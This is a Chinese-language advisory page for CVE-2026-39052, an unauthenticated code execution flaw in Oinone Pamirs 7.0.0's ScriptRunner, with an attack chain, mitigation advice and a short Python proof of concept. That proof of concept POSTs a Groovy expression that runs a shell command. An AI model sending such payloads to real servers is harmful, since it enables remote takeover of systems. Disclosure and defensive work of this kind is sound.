CVE-2026-39052 CVSS 6.5 中危

CVE-2026-39052 Oinone Pamirs代码执行漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39052

漏洞类型

远程代码执行

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Oinone Pamirs

漏洞概述

Oinone Pamirs 7.0.0版本中存在代码执行漏洞。该漏洞源于ScriptRunner组件在处理脚本表达式时存在设计缺陷。具体而言，`ScriptRunner.run`方法直接对攻击者控制的脚本表达式进行求值，且未实施沙箱隔离或白名单限制机制。攻击者可利用此缺陷，在无需身份验证的情况下，通过网络向受影响的服务器发送特制的恶意脚本请求，从而在服务器端执行任意代码。这可能导致敏感信息泄露、数据篡改，甚至完全控制服务器系统。

技术细节

该漏洞的技术核心在于Oinone Pamirs框架集成的ScriptRunner组件存在不安全的动态代码执行逻辑。在`ScriptRunner.run(String expression, String type, Map<String, Object> context)`方法调用过程中，系统直接接收用户传入的`expression`参数，并将其传递给底层的脚本引擎（如Groovy、JavaScript等）进行解析和执行。由于该过程完全绕过了安全沙箱机制，且未对输入内容进行严格的允许列表校验，攻击者可以构造恶意的脚本代码。根据CVSS向量分析，攻击复杂度低（AC:L），且无需用户交互（UI:N）及特权（PR:N）。攻击者只需通过网络（AV:N）访问相关接口，即可注入操作系统命令或特定语言代码，进而控制服务器进程，窃取敏感数据或破坏系统完整性。由于无需认证，该漏洞极易被自动化扫描工具探测并利用。

攻击链分析

STEP 1

侦察

攻击者扫描网络，寻找运行Oinone Pamirs 7.0.0版本的目标服务器。

STEP 2

构造载荷

攻击者编写恶意的脚本表达式（如Groovy或JS代码），旨在执行系统命令或反弹Shell。

STEP 3

发送请求

攻击者向ScriptRunner接口发送特制的HTTP POST请求，其中包含恶意的expression参数。

STEP 4

代码执行

服务器端ScriptRunner未经过滤直接解析并执行该脚本，攻击者获得服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-39052
# Target: Oinone Pamirs 7.0.0
# Description: Exploits ScriptRunner.run to execute arbitrary code.

target_url = "http://target-ip:port/api/script/run"

# Malicious payload example (e.g., Groovy syntax)
# Attempting to execute a simple command or script
payload = {
    "expression": "def proc = \"ls -la\".execute(); proc.waitFor(); println(proc.text)",
    "type": "groovy",
    "context": {}
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Exploit successful! Response:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Oinone Pamirs 7.0.0

防御指南

临时缓解措施

建议立即检查当前Oinone Pamirs的版本，确认是否为7.0.0。如果是，应尽快应用官方补丁或升级。在无法立即升级的情况下，建议通过WAF（Web应用防火墙）拦截对相关ScriptRunner接口的请求，或在网络层面限制对受影响端口的访问，直至修复完成。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-39052
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-39052
3 Details https://www.cvedetails.com/cve/CVE-2026-39052/
4 VulDB https://vuldb.com/cve/CVE-2026-39052
5 Link https://gist.github.com/Misakim1/859c3eb9ced699089ee0747dae9bedc1
6 Link https://github.com/oinone/oinone-pamirs
7 Link https://www.oinone.top/changelog

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表